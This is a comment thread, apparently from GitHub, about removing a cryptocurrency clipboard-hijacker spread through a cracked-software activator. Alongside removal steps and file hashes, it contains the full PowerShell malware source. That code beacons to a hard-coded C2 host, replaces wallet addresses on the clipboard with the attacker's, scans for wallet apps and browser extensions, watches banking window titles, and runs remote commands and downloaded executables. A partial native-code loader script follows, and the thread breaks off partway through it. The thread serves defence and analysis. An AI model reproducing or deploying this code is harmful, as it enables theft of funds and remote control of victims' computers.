I've just removed the whole NetService folder and the fake log too. Regarding SyncAppvPublishingServer.vbs file, I'm running Windows 10 Pro, and the file you provided was extracted from a Windows 11 clean install, as you stated. As I wasn't sure I could use that file in Windows 10 Pro, what I've done is I've extracted it from a Windows 10 installation from another PC. However, I've compared the MD5 checksum of both files (the one allegedly infected and the one extracted from a Windows 10 Pro not infected) and it matches: 20C4FE2B130D9F0C92D7629E71AFBB66 (and googling that MD5 checksum it belongs to that file, so it must be legit).

So I'm assuming the file is OK. I must say yesterday I performed an integrity check scan with the command: sfc /scannow and it detected some corrupted files and repaired them, so that could be the reason for the MD5 match.

EDIT: I've just compared the code inside my SyncAppvPublishingServer.vbs and the code inside yours and they are exactly the same. 👍

That should be all. As for the app you were patching to begin with, in my case it isn't doing anything harmful and runs just fine.

So what you mean is the Team-crackerfg - Activator is not the problem?

What the malware appears to do

It monitors your clipboard looking for a cryptocurrency address. Once it finds one, it replaces it with its own address in the hopes you do not notice when you paste it. You'd be sending crypto to the malware writer's address if you don't. It also pings a server with some computer identifying information and the original address you wanted to send to. It doesn't look like any personal data is transmitted. I believe that's all it does, so it's not the most harmful thing. The addresses that the malware uses have made over $3m USD!

@NextNext333

Wow... Scammers are getting more and more ingenious these days.

Thanks @infernoboy , for me it worked great.

Unfortunately, I couldn't find the application/crack responsible for this, even looking very deep.

@infernoboy saving my life here. I pasted a BTC address that I immediately recognized as not the one I copied. Opened my clipboard manager, and sure enough, a hidden Powershell process replaced the address I copied.

@jblube @NextNext333 : I found the alleged patch here. Uploaded by some PB user called MotasemBT. I'll upload those files soon.

@jblube @uselesslemma I'm 100% sure this malware was installed when I was trying (installing and cracking) some programs which can migrate WhatsApp messages from iPhone to Android and vice versa. So it must be Wondershare Dr.Fone, iCareFone or Backuptrans, or more importantly, cracks packaged alongside them. In fact, I downloaded BackupTrans Android iPhone WhatsApp Transfer Plus 3.2.174 (x64) which was uploaded by someone called MotasemBT, you are right @uselesslemma. It's not a VIP or trusted uploader, so...

@infernoboy

infernoboy commented Apr 22, 2022

@NextNext333 The "Activator" patcher itself is what installs the malware, but it also installs a patched *.exe of the target app. That *.exe file for the app you patched might be safe, as mine is, but I cannot be sure about your specific scenario.

I discovered this from a different torrent utilizing the same "Team-crackercfg - Activator" program, but for a different app. It was uploaded by "DeGun" on 1337x.to

I also noticed that SyncAppvPublishingServer.vbs wasn't actually changed, but I did receive a report that it had been tampered with. Maybe it was just making sure it was there?

Glad I could help everyone out!

@NextNext333

NextNext333 commented Apr 23, 2022

@NextNext333 The "Activator" patcher itself is what installs the malware, but it also installs a patched *.exe of the target app. That *.exe file for the app you patched might be safe, as mine is, but I cannot be sure about your specific scenario.

I discovered this from a different torrent utilizing the same "Team-crackercfg - Activator" program, but for a different app. It was uploaded by "DeGun" on 1337x.to

I also noticed that SyncAppvPublishingServer.vbs wasn't actually changed, but I did receive a report that it had been tampered with. Maybe it was just making sure it was there?

Glad I could help everyone out!

@infernoboy Hmmm, it could be the case: the Activator might actually patch the target app successfully, but I can't confirm it in my case, as I removed everything related to this malware when I noticed the suspicious outgoing connection ESET Antivirus warned me about.

But what I can assure is that the target app, after applying the patch, remained a trial version, or at least that's what the app itself stated ("Unregistered Version"). Perhaps the app was in fact cracked despite that statement; I don't know, because I didn't even use it.

Info about the app I was trying to use:

=== MD5 from BackupTrans Android iPhone WhatsApp Transfer Plus 3.2.174 (x64) [TPB User MotasemBT] ===

Setup.exe > 519AF1A8BCE11012D326251B74651823
Activator.exe > A13E8E1338541990F4961CD187391504
APMonUI.dll > 5B59408EE5B54BCE63E5415C71B8AA44

=== MD5 from BackupTrans Android iPhone WhatsApp Transfer Plus 3.2.174 (x64) [1337x.to User PROAC12] ===

Setup.exe > 519AF1A8BCE11012D326251B74651823
Activator.exe > A13E8E1338541990F4961CD187391504
APMonUI.dll > 5B59408EE5B54BCE63E5415C71B8AA44

=== MD5 from BackupTrans Android iPhone WhatsApp Transfer Plus 3.2.173 (x64) [1337x.to User DeGun] ===

Setup.exe > 4E89C5EDC12AE37DC28F8ED5A7DB8859
Activator.exe > B8476084B38A63475C249F64FAC74EAE
APMonUI.dll > 5B59408EE5B54BCE63E5415C71B8AA44

APMonUI.dll is always the same file. Setup.exe and Activator.exe are different for the 3.2.173 version, as expected as the app version is different.

@JeffreyScheffel

JeffreyScheffel commented Apr 26, 2022

Thanks for this, it worked.

The code in my script was a bit different though. Most of it is the same; I attached it in case anyone wants to take a look. I'm just wondering if this is something worth reformatting the OS over, as I don't know if there's other malware this script has downloaded, or if just following @infernoboy's instructions is good enough.

# Second variant of the same clipper (posted by a commenter). Differences from the first
# listing are noted inline; the C2 endpoint and address book are the same.
$scriptItem = Get-Item -Path $MyInvocation.MyCommand.Path;
# Re-launches itself in an STA powershell and exits. $sta is never assigned in this listing,
# so how the re-launched child avoids repeating this step is not visible here — confirm on a sample.
if ($sta -ne "STA") {
    powershell -sta -file $MyInvocation.MyCommand.Path;
    exit(0);
}
$OS_Major = [System.Environment]::OSVersion.Version.Major.ToString() + "." + [System.Environment]::OSVersion.Version.Minor.ToString();

# Pause/resume flag driven by the C2 "worker" header (replaces the named event of the first variant).
$global:worker = $true;

# Expands the environment variable named $str (wrapped in %...%); unknown names stay literal.
function XF3a8JO3r5r8G([string] $str) {
    return [System.Environment]::ExpandEnvironmentVariables("%" + $str + "%")
}

# Returns property $value of the first instance of WMI class $class; a fresh GUID if none.
function WMI([string] $class, [string] $value) {
    $val = $null;
    $results = (Get-WmiObject -Class $class) ;
    foreach ($item in $results) {
        $val = $item[$value];
		break;
    }
	if($val -eq $null)
	{
	   $val = [Guid]::NewGuid().ToString();
	}
    return $val;
}
# Victim identifier: first logical disk's volume serial (renamed from Get-HWID in the first variant).
function B6ZqvVzzJXq27j() {
    return (WMI 'win32_logicaldisk' "VolumeSerialNumber") 
}

# OS caption for the profile string.
function ik9hXhN11R() {
    return (WMI 'Win32_OperatingSystem' "Caption") 
}

# Processor address width for the profile string.
function P9TEtu77LCNtD() {
    return (WMI 'Win32_Processor' "AddressWidth") 
}

# Decodes the second byte of AntiVirusProduct.productState into Enabled/Disabled/Unknown.
function av_enabled([uint32]$state) {
    [byte[]] $bytes = [System.BitConverter]::GetBytes($state);
    if (($bytes[1] -eq 0x10) -or ($bytes[1] -eq 0x11)) {
        return "Enabled";
    }
    elseif (($bytes[1] -eq 0x00) -or ($bytes[1] -eq 0x01) -or ($bytes[1] -eq 0x20) -or ($bytes[1] -eq 0x21)) {
        return "Disabled";
    }
    return "Unknown";
}

# Lists installed AV products from both SecurityCenter namespaces as "Name [state], ...".
function TmBvivf3Wwj8U7NzZh() {

    $avs = Get-WmiObject -Namespace "root\SecurityCenter" -Class "AntiVirusProduct";
    $avs += Get-WmiObject -Namespace "root\SecurityCenter2" -Class "AntiVirusProduct";
    $avf = New-Object Collections.Generic.List[string];

    foreach ($av in $avs) {
        $enabled = (av_enabled $av.productState);
        $avf.Add($av.displayName + " [$enabled]")
    }

    return [string]::Join(", ", $avf.ToArray())
}

# Normalises a profile field: strips "/" and upper-cases the first character; "" stays "".
function vxUABGtfQ7B7([string]$str) {
    if ($str.Length -eq 0) {
        return "";
    }
    $str = $str.Replace("/", "");
    return ($str.Substring(0, 1).ToUpper() + $str.Substring(1));
}

# Builds the victim profile string for the X-User-Agent header. Same field order as the first
# variant; $nb0MawLGyrxf (leading tag) and $UV1oAmOp0S3 (separator) are not assigned in this
# listing — presumably the version/HWID prefix and "\" — verify against a full sample.
# FindPaths is also not defined in this listing.
function getUserAgent {
    $iJunq6e5ivimimy = FindPaths;
    return $nb0MawLGyrxf + $UV1oAmOp0S3 + (vxUABGtfQ7B7 (XF3a8JO3r5r8G "COMPUTERNAME")) + $UV1oAmOp0S3 + (vxUABGtfQ7B7 (XF3a8JO3r5r8G "USERNAME")) + $UV1oAmOp0S3 + (vxUABGtfQ7B7 (ik9hXhN11R)) + " [" + (P9TEtu77LCNtD) + "]" + $UV1oAmOp0S3 + (vxUABGtfQ7B7 (TmBvivf3Wwj8U7NzZh)) + $UV1oAmOp0S3 + $iJunq6e5ivimimy + $UV1oAmOp0S3
}


# C2 beacon (same endpoint as the first variant, hard-coded here). POSTs $data with the
# profile in X-User-Agent and optional X-notify; the "worker" response header sets
# $global:worker (false when "0"). Returns the response body.
function oUjmVhxHJ4Qhrw($data, $notify) {
    $URL = "http://api.private-chatting.com/connect";  # C2 endpoint (network IoC)
    if ($OS_Major -ne "6.1") {
        [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;
        [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }  # cert validation disabled
    }
    $cli = New-Object System.Net.WebClient;
    $useragent = getUserAgent;
    $cli.Headers['X-User-Agent'] = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($useragent));
    if ($notify) {
        $cli.Headers['X-notify'] = $notify
    }
    $Response = $cli.UploadString($URL, $data);
    $WorkerEn = $cli.ResponseHeaders["worker"];
    if ($WorkerEn -eq "0") {
        $global:worker = $false;
    }
    else {
        $global:worker= $true;
    }
    return $Response.ToString()

}

# Downloads $URL to $Filename with a spoofed Chrome User-Agent; Invoke-WebRequest except on
# OS 6.1, where WebClient is used. Certificate validation is disabled; content is not verified.
function DownloadFile([string]$URL, [string]$Filename) {
    [string]$UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/599.99 (KHTML, like Gecko) Chrome/81.0.3999.199 Safari/599.99";
    if ($OS_Major -ne "6.1") {
        [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;
        [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true };
        $ret = Invoke-WebRequest -Uri $URL -OutFile $Filename -UserAgent $UserAgent -Method 'GET'
    }
    else {
        $cli = New-Object System.Net.WebClient;
        $cli.Headers['User-Agent'] = $UserAgent;
        $cli.DownloadFile($URL, $Filename);
    }

   
}
# Analyst note: thin wrapper around DownloadFile used by the "DwnlExe" command in
# main. The $wait parameter is accepted but ignored; the download is synchronous anyway.
function yQM1ybBDSjEP($url, $path, $wait) {
    DownloadFile $url $path
}

# Analyst note: self-removal handler for the "SelfRemove" C2 command. Deletes the
# file named by $svauXHdYmXwV1whE, which main sets to $scriptItem.FullName (the
# running script's own path) and which is visible here only via dynamic scoping.
# Only the script file is removed; the scheduled task / persistence mechanism that
# launches it is not touched by this function.
#   $quit - when truthy, terminates the process with exit code 0 after the delete.
function Gn4bSDMHKIxEE8UP7wZJ($quit) {

    Remove-Item -Path $svauXHdYmXwV1whE;
    if ($quit) {
        exit(0);
    }
}

# Analyst note: returns $true when a command named $func resolves via Get-Command,
# $false otherwise (any error is swallowed). Used once below to decide whether the
# built-in clipboard cmdlets exist or a WPF-based fallback must be defined.
function Test-Function([string] $func) {
    try {
        $ret = Get-Command  -Name $func;
        if ($ret) {
            return $true
        }
    }
    catch {
    }
    return $false
}

# Analyst note: compatibility shim. On hosts whose PowerShell lacks Get-Clipboard /
# Set-Clipboard, loads WPF (PresentationFramework) and defines replacements with the
# same parameter names main2 uses (-Format, -Value) so the clipboard module still runs.
# Loading PresentationFramework into a powershell.exe process that otherwise has no
# UI is a usable telemetry signal on such hosts.
if (!(Test-Function "Get-Clipboard") -or !(Test-Function "Set-Clipboard")) {
    Add-Type -AssemblyName PresentationFramework;

    # $Format is accepted for signature compatibility only; text is always returned.
    function Get-Clipboard($Format) {
        return [System.Windows.Clipboard]::GetText();
    }

    function Set-Clipboard($Value) {
        [System.Windows.Clipboard]::SetText($Value)
    }


}

# Analyst note: reports an event to the C2 by sending an empty body with the
# X-notify header set to "<coin> - <value>". main2 passes the currency code and the
# victim's original clipboard value; FindWindow passes a fixed tag and a
# "keyword[window title]" string. The beacon's response is discarded.
function log_event([string] $coin, [string] $value) {
    oUjmVhxHJ4Qhrw "" ($coin + " - " + $value)
} 



# Analyst note: JSON table consumed by main2. Each entry pairs an attacker-controlled
# destination address ("a") with a regex ("r") that recognises a victim address of the
# same currency ("c"); a clipboard value matching "r" is replaced with "a".
# The "a" values are indicators of compromise for this sample. BTC is covered by three
# separate entries keyed on address prefix (bc1 / 1 / 3) so the substituted address
# keeps the victim's address format. This is an expandable here-string, so no
# comments can be placed inside it.
$coins = @"
[
    {
        "a": "bc1qn6ype8u5kgj672mvsez9wz9wt9wk22tzd5vprp",
        "r": "^bc1[a-z0-9]{39,59}$",
        "c": "BTC"
    },
    {
        "a": "1Pqkb4MZwKzgSNkaX32wMwg95D9NfW9vZX",
        "r": "^1[a-km-zA-HJ-NP-Z1-9]{26,33}$",
        "c": "BTC"
    },
    {
        "a": "3JvBvRuBfYvB6MjzMornj9EQpxhq9W7vXP",
        "r": "^3[a-km-zA-HJ-NP-Z1-9]{26,33}$",
        "c": "BTC"
    },
    {
        "a": "qq9yrhef7csy3yzgxgs0rvkvez440mk53gv8ulyu6a",
        "r": "^((bitcoincash|bchreg|bchtest):)?(q|p)[a-z0-9]{41}$",
        "c": "BCH"
    },
    {
        "a": "bnb1vmwl54jxj9yvsgz33xtyuvqnurdjy2raqnttkq",
        "r": "^(bnb)([a-z0-9]{39})$",
        "c": "BNB"
    },
    {
        "a": "0x884467182849bA788ba89300e176ebe11624C882",
        "r": "^0x[a-fA-F0-9]{40}$",
        "c": "ETH"
    },
    {
        "a": "48qx1krgEGzdcSacbmZdioNwXxW6r43yFSJDKPWZb3wsK9pYhajHNyE5FujWo1NxVwEBvGebS7biW9mjMEWdMevqMGmDJ6x",
        "r": "^[48][0-9AB][1-9A-HJ-NP-Za-km-z]{93}$",
        "c": "XMR"
    },
    {
        "a": "rH6dyKWNpcvFz6fQ4ohyDbevSxcxdxfSmz",
        "r": "^r[rpshnaf39wBUDNEGHJKLM4PQRST7VWXYZ2bcdeCg65jkm8oFqi1tuvAxyz]{24,34}$",
        "c": "XRP"
    },
    {
        "a": "DDxhfK5wbJkRN25mAbBYk3ND4xLjiMRyNq",
        "r": "^D{1}[5-9A-HJ-NP-U]{1}[1-9A-HJ-NP-Za-km-z]{32}$",
        "c": "DOGE"
    },
    {
        "a": "Xtwj8uGx77NYBUki1UCPvEhe4kHYi6yWng",
        "r": "^X[1-9A-HJ-NP-Za-km-z]{33}$",
        "c": "DASH"
    }

]
"@
# Analyst note: the clipboard-hijack module, invoked once per iteration of main's
# loop. Reads the clipboard as text, trims it, and for each $coins entry whose regex
# matches (and whose address differs from the attacker's), overwrites the clipboard
# with the attacker address and reports the original value to the C2 via log_event.
# The early return only fires while $global:worker is exactly $false; before the
# first beacon has set it, the comparison of $null with $false is not true, so the
# module is active by default. All errors are swallowed.
# Mitigation: the swap is visible to the user only as a changed paste; detection
# relies on the accompanying network beacon or on script-block logging.
function main2 {

    if ($global:worker -eq $false) {
        return;
    }

    # Re-parsed from the JSON here-string on every call.
    $book = ConvertFrom-Json $coins

    try {
        [string]$clip = Get-Clipboard -Format Text;
        $clip = $clip.Trim();

        foreach ($entry in $book) {

            # $clip is not re-read after a swap, so later entries are still tested
            # against the victim's original value.
            if (($clip -match $entry.r) -and ($clip -ne $entry.a) -and ($entry.a -ne "")) {
                Set-Clipboard -Value $entry.a
                # Written in argument mode as `$clip+"newnewapp"`; this presumably yields
                # the clipboard value followed by the literal text "+newnewapp" rather
                # than arithmetic — confirm against captured beacons.
                log_event $entry.c $clip+"newnewapp"
            }

        }
               
    }
    catch {
    }
}



# Analyst note: the implant's command loop. Every second it beacons to the C2 with an
# empty request, splits the reply on "|V|" into fields, dispatches on field 0, then
# runs the clipboard module (main2) and the window-title module (FindWindow).
# Commands observed in this sample:
#   "Cmd"        - field 1 is executed via a hidden cmd.exe /c.
#   "DwnlExe"    - field 1 (URL) is downloaded to %temp%\<field 2>, then
#                  "<field 3><path>" is executed via a hidden cmd.exe /c.
#   "SelfRemove" - deletes the script file and exits the process.
# The variables assigned at the top are function-local but are read by other
# functions (getUserAgent, Gn4bSDMHKIxEE8UP7wZJ) through dynamic scoping. Every
# stage is wrapped in an empty catch, so a failed beacon or command never stops
# the loop.
# Detection: periodic (~1 s) POSTs to the C2 host; cmd.exe children of
# powershell.exe with -WindowStyle Hidden; executables dropped directly into %temp%.
function main {

    
    # Field separator for C2 replies.
    $ZFKUuv2t12Af = "|V|";
    # Separator used between fingerprint fields in getUserAgent.
    $UV1oAmOp0S3 = "\";
    # Version tag for this build; it is distinct from the $__Version__ value set at
    # the top of the script.
    $V7vFcwq3wUVRrsgcv = "M_22";
    # B6ZqvVzzJXq27j is not visible in this listing; presumably a host identifier
    # (the script defines a Get-HWID helper) — confirm.
    $nb0MawLGyrxf = $V7vFcwq3wUVRrsgcv + '_' + (B6ZqvVzzJXq27j);
    # %temp% with a trailing "\" — drop directory for "DwnlExe".
    $AuVAfc591z0Yw = (XF3a8JO3r5r8G "temp") + $UV1oAmOp0S3;
    # Own script path/name, used by the SelfRemove handler.
    $svauXHdYmXwV1whE = $scriptItem.FullName;
    $aWOPoMdm8aLL89 = $scriptItem.Name;
    # Assigned but not referenced anywhere in this listing.
    $EwcQB8qBuCScs = "powershell.exe";
	

    while ($true) {

        try {
            # Beacon with no body; the reply is the command string.
            [string]$kk9XDcoU8Sfo692 = oUjmVhxHJ4Qhrw;
            [string[]] $sep = $ZFKUuv2t12Af;
            $Fd1Jal88zKyxij = $kk9XDcoU8Sfo692.Split( $sep, [StringSplitOptions]::None);
            $ivI0sA6txn5XPifq = $Fd1Jal88zKyxij[0];
            $JkByjqH1xztsW2YUG = $Fd1Jal88zKyxij[1];
        
            if ($ivI0sA6txn5XPifq -eq "Cmd") { 
                Start-Process -FilePath "cmd.exe" -WindowStyle "Hidden" -ArgumentList ("/c " + $JkByjqH1xztsW2YUG) 
            }
            if ($ivI0sA6txn5XPifq -eq "DwnlExe") {
                $path = $AuVAfc591z0Yw + $Fd1Jal88zKyxij[2];
                $cmd = $Fd1Jal88zKyxij[3] + $path;
                yQM1ybBDSjEP $Fd1Jal88zKyxij[1] $path $true;
                Start-Sleep 1
                Start-Process -FilePath "cmd.exe" -WindowStyle "Hidden" -ArgumentList ("/c " + $cmd) 
            }
            if ($ivI0sA6txn5XPifq -eq "SelfRemove") {
                Gn4bSDMHKIxEE8UP7wZJ $true
            } 
        }
        catch {}

  
  
  
  try {
            main2;
        }
        catch
        {}
       
        try {
            FindWindow
        }
        catch
        {}
        
        Start-Sleep 1
    }
   

}
# Analyst note: JSON table consumed by FindPaths. Each "root" is an environment-
# variable-based directory and each target is a sub-path whose mere existence is
# reported back under "name". The name suffix encodes the root: -A for %appdata% /
# %localappdata% desktop wallets, -C / -E / -B for extension directories of Chrome,
# Edge and Brave respectively (the "path" values under those roots are extension
# directory names). FindPaths only tests for presence; it does not read these
# directories. This is a literal (single-quoted) here-string, so no comments can be
# placed inside it.
$pathdata = 
@'
[
    {
        "root": "%appdata%",
        "targets": [
            {
                "name": "Exodus-A",
                "path": "Exodus"
            },
            {
                "name": "Atomic-A",
                "path": "Atomic Wallet"
            },
            {
                "name": "Electrum-A",
                "path": "Electrum"
            },
            {
                "name": "Ledger-A",
                "path": "Ledger Live"
            },
            {
                "name": "Jaxx-A",
                "path": "Jaxx Liberty"
            },
            {
                "name": "com.liberty.jaxx-A",
                "path": "com.liberty.jaxx"
            },
            {
                "name": "Guarda-A",
                "path": "Guarda"
            },
            {
                "name": "Armory-A",
                "path": "Armory"
            },
            {
                "name": "DELTA-A",
                "path": "DELTA"
            },
            {
                "name": "TREZOR-A",
                "path": "TREZOR Bridge"
            },
            {
                "name": "Bitcoin-A",
                "path": "Bitcoin"
            },
            {
                "name": "binance-A",
                "path": "binance"
            }
        ]
    },
    {
        "root": "%localappdata%",
        "targets": [
            {
                "name": "Blockstream-A",
                "path": "Blockstream Green"
            },
            {
                "name": "Coinomi-A",
                "path": "Coinomi"
            }
        ]
    },
    {
        "root": "%localappdata%\\Google\\Chrome\\User Data\\Default\\Extensions",
        "targets": [
            {
                "name": "Metamask-C",
                "path": "nkbihfbeogaeaoehlefnkodbefgpgknn"
            },
            {
                "name": "MEWcx-C",
                "path": "nlbmnnijcnlegkjjpcfjclmcfggfefdm"
            },
            {
                "name": "Coin98-C",
                "path": "aeachknmefphepccionboohckonoeemg"
            },
            {
                "name": "Binance-C",
                "path": "fhbohimaelbohpjbbldcngcnapndodjp"
            },
            {
                "name": "Jaxx-C",
                "path": "cjelfplplebdjjenllpjcblmjkfcffne"
            },
            {
                "name": "Coinbase-C",
                "path": "hnfanknocfeofbddgcijnmhnfnkdnaad"
            }
        ]
    },
    {
        "root": "%localappdata%\\Microsoft\\Edge\\User Data\\Default\\Extensions",
        "targets": [
            {
                "name": "Metamask-E",
                "path": "ejbalbakoplchlghecdalmeeeajnimhm"
            },
            {
                "name": "Coinomi-E",
                "path": "gmcoclageakkbkbbflppkbpjcbkcfedg"
            }
        ]
    },
    {
        "root": "%localappdata%\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Extensions",
        "targets": [
            {
                "name": "Metamask-B",
                "path": "nkbihfbeogaeaoehlefnkodbefgpgknn"
            },
            {
                "name": "MEWcx-B",
                "path": "nlbmnnijcnlegkjjpcfjclmcfggfefdm"
            },
            {
                "name": "Coin98-B",
                "path": "aeachknmefphepccionboohckonoeemg"
            },
            {
                "name": "Binance-B",
                "path": "fhbohimaelbohpjbbldcngcnapndodjp"
            },
            {
                "name": "Jaxx-B",
                "path": "cjelfplplebdjjenllpjcblmjkfcffne"
            },
            {
                "name": "Coinbase-B",
                "path": "hnfanknocfeofbddgcijnmhnfnkdnaad"
            }
        ]
    }
]
'@;

# Analyst note: wallet reconnaissance. Produces a base64-encoded, newline-separated
# list of "name" tags for wallet applications and browser extensions found on the
# host, which getUserAgent embeds in every beacon. Two sources:
#   1. a recursive search of Firefox profiles for a .xpi whose name matches the
#      MetaMask extension id pattern (reported as "metamask-F");
#   2. a Test-Path check for every root/target pair in $pathdata.
# Only presence is reported; no wallet files are read or transmitted by this
# function. The Write-Host "error" in the inner catch is the only console output in
# the listing. This function is called on every beacon, so the recursive
# Get-ChildItem runs roughly once per second while the loop is active.
function FindPaths {

    $a = ConvertFrom-Json $pathdata
    $results = New-Object Collections.Generic.List[string];

    try {
        $ba = Get-ChildItem -Path "$env:appdata\Mozilla\Firefox\Profiles\*.xpi" -Recurse -Force;
        Foreach ($i in $ba) {
            # -match treats the pattern as a regex, so the unescaped "." and "@" match
            # literally or as any character; the effect is a substring test.
            if ($i.Name -match "ebextension@metamask.io.xpi") {
                try {
                    [string] $ss = "metamask-F"
                    $results.Add($ss)
    
                }
                catch {
                    Write-Host "error"
                }
            }
        }
    }
    catch {}


    foreach ($entry in $a) {
        # Unlike FindWindow, this path is expanded before use.
        $rootdir = [System.Environment]::ExpandEnvironmentVariables($entry.root);
        foreach ($target in $entry.targets) {
            if ((Test-Path -Path (Join-Path -Path $rootdir -ChildPath $target.path))) {
                $results.Add($target.name)
            }

        }
    
    }

    $ret = [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes([string]::Join("`n", $results)));
    return $ret;
}


# Analyst note: window-title surveillance. Enumerates every process with a
# non-empty main window title and, for each title containing one of the exchange /
# payment / bank keywords below, reports "keyword[title]" to the C2 via log_event
# (tagged 'newnewapp'). A one-line state file dedupes reports: the last matched
# keyword is written to the file and no report is sent while the file still holds
# that keyword. The file path is the literal string "%SystemDrive%\Users\Public\log.dat";
# .NET file APIs do not expand environment variables, so this presumably resolves
# relative to the process's current directory rather than under the system drive —
# confirm on an infected host. The catch branch (first run, file absent) writes the
# file without reporting. $logsend, $datatowrite and $gtr are assigned but unused.
# Indentation below is the sample's own mix of tabs and spaces.
function FindWindow {
    
        $keywords = @('binance', 'coinbase','blockchain','voyager','blockfi','coindesk','etoro','kucoin','citi','paxful','paypal','huobi','poloniex','bittrex','kraken','bitfinex','bitstamp')
    $windows = (Get-Process | Where-Object { $_.MainWindowTitle -ne "" } | Select-Object MainWindowTitle)

    foreach ($wndobj in $windows) {
        [string]$wnd = $wndobj.MainWindowTitle;
        foreach ($keyword in $keywords) {
            if ($wnd.ToLower().Contains($keyword.ToLower())) {
				try {
                    # Throws when the state file does not exist yet -> catch below.
                    $contentfile = [System.IO.File]::ReadAllText("%SystemDrive%\Users\Public\log.dat").ToLower().replace(' ','');
                    $logsend = 'newnewapp' + ($keyword.ToLower() + "[" + $wnd.ToLower() + "]").ToLower().replace(' ','');
       if( $contentfile -eq $keyword.ToLower().replace(' ','') )
				{
                    # Already reported this keyword; suppress.
                    $gtr ="";
				}
				else
				{
                    $datatowrite = ('newnewapp' + ($keyword.ToLower() + "[" + $wnd.ToLower() + "]")).ToLower().replace(' ','');
									[System.IO.File]::WriteAllText("%SystemDrive%\Users\Public\log.dat",$keyword.ToLower().replace(' ','') );
					                log_event 'newnewapp'  ($keyword.ToLower() + "[" + $wnd.ToLower() + "]");
				}	
    }
    catch {
        # First sighting with no state file: record the keyword, send nothing.
        [System.IO.File]::WriteAllText("%SystemDrive%\Users\Public\log.dat",$keyword.ToLower().replace(' ','') );

    }
							
            }
        }
    }
    
}


# Analyst note: script entry point. main already loops forever; this outer loop
# restarts it after any uncaught exception, so the process never exits on error.
# The only exit paths in the listing are the "SelfRemove" command (exit 0) or
# external termination; removal therefore also requires deleting the persistence
# mechanism that launches the script.
while ($true) {
    try {
        main
    }
    catch {

    }
}

@WolfAlchemy

WolfAlchemy commented Jun 4, 2022

How to remove this malware

  1. Open Task Scheduler
  2. A task was created under Microsoft > Windows > NetService > Network that is spawning PowerShell
  3. You can safely delete the entire NetService folder as it was also created by the malware
  4. Delete a fake log file that it created where it hides the script: C:\Windows\logs\system-logs.txt
  5. It also replaces the contents of C:\Windows\System32\SyncAppvPublishingServer.vbs with its own version. A copy from a clean install of Windows 11 can be found here: https://gist.github.com/infernoboy/7cc1fe26e647dd08e6e63a201cb38e27

That should be all. As for the app you were patching to begin with, in my case it isn't doing anything harmful and runs just fine.

What the malware appears to do

It monitors your clipboard looking for a cryptocurrency address. Once it finds one, it replaces it with its own address in the hope that you do not notice when you paste it. If you don't, you'd be sending crypto to the malware writer's address. It also pings a server with some computer-identifying information and the original address you wanted to send to. It doesn't look like any personal data is transmitted. I believe that's all it does, so it's not the most harmful thing. The addresses that the malware uses have made over $3m USD!

@NextNext333

@infernoboy hey, so I found this thread after PowerShell tried to do the same on my computer, but it's actually not quite the same. Looked through task manager and task scheduler, but didn't find anything suspicious.
But defender stopped PowerShell from loading resource Heur.BZC.ZFV.Boxter.361.52C9B94F. I don't suppose you have any ideas? I've looked through the folders you suggested but came up with nothing.

Side note. Y'all are nerds, and I wish I was on your level. XD I'm like mediocre above novice computer.... knowledge...wise...

@philhk

philhk commented Aug 30, 2022

Does anyone know if there is anything suspicious in this code? It's from a crack by crackerfg.

# Reviewer note: WinForms is loaded only for the FolderBrowserDialog used below;
# the MessageBox calls rely on WPF's [Windows.MessageBox], which is not loaded here.
Add-Type -AssemblyName System.Windows.Forms

# Reviewer note: the whole payload comes from a sidecar file, 'bin.dat', read
# relative to the current directory. Nothing in the script can be judged without
# that file: the first 5920 bytes of it are executed as native code further down.
# Two process environment variables (Desktop, InstallDir) are set but never read by
# the script itself; presumably they are consumed by the native code — confirm.
$dat = [IO.File]::ReadAllBytes('bin.dat');
[Environment]::SetEnvironmentVariable('Desktop', [Environment]::GetFolderPath('Desktop'));
$installDir = [Environment]::ExpandEnvironmentVariables('%windir%');
# %windir% is asked for as the "default installation path", which is odd for an
# application patcher; the dialog only appears if that directory is missing.
if (-not [IO.Directory]::Exists($installDir)) {
    [Windows.MessageBox]::Show("Couldn't find defualt installation path ($installDir), Please specify.");
    $browser = New-Object System.Windows.Forms.FolderBrowserDialog
    $browser.Description = "Select Installation Folder";
    $browser.ShowNewFolderButton = $false;
    if ($browser.ShowDialog() -ne "OK") {
        exit(0);
    }
    $installDir = $browser.SelectedPath;
}
[Environment]::SetEnvironmentVariable('InstallDir', $installDir);

# Reviewer note: indexes every loaded assembly by file name (case-insensitive) so
# that Get-Func can reach into System.dll's internal types by reflection instead of
# declaring a P/Invoke signature — a common way to avoid the strings that
# Add-Type / DllImport would leave behind.
$assemblies = New-Object -TypeName System.Collections.Generic.Dictionary'[string, System.Reflection.Assembly]' -ArgumentList ([StringComparer]::OrdinalIgnoreCase)
foreach ($assembly in ([AppDomain]::CurrentDomain.GetAssemblies())) {
    $assemblies[[System.IO.Path]::GetFileName($assembly.Location)] = $assembly;
}

# Reviewer note: turns a raw function pointer into a callable .NET delegate.
# A throwaway delegate type with the requested parameter and return types is built
# at run time with Reflection.Emit, then bound to $ptr via
# GetDelegateForFunctionPointer. With this helper the script can call any address —
# an exported API (Get-Func) or a buffer it filled itself (the $patch call below).
#   $ptr     - address to call
#   $params  - parameter types of the delegate's Invoke
#   $rettype - return type of the delegate's Invoke
# Returns: a delegate instance whose Invoke calls $ptr.
function Get-Ptr {
    param (
        [IntPtr]
        $ptr,
        [type[]]
        $params,
        [type]
        $rettype
    )
    # Random (GUID-based) assembly, module and type names: nothing stable to scan for.
    $bu = [AppDomain]::CurrentDomain.DefineDynamicAssembly([System.Reflection.AssemblyName]::new(('_' + [guid]::NewGuid().ToString())), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(('_' + [guid]::NewGuid().ToString()), $false).DefineType(('_' + [guid]::NewGuid().ToString()), 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]);
    $bu.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $params).SetImplementationFlags('Runtime, Managed');
    $bu.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $rettype, $params).SetImplementationFlags('Runtime, Managed');
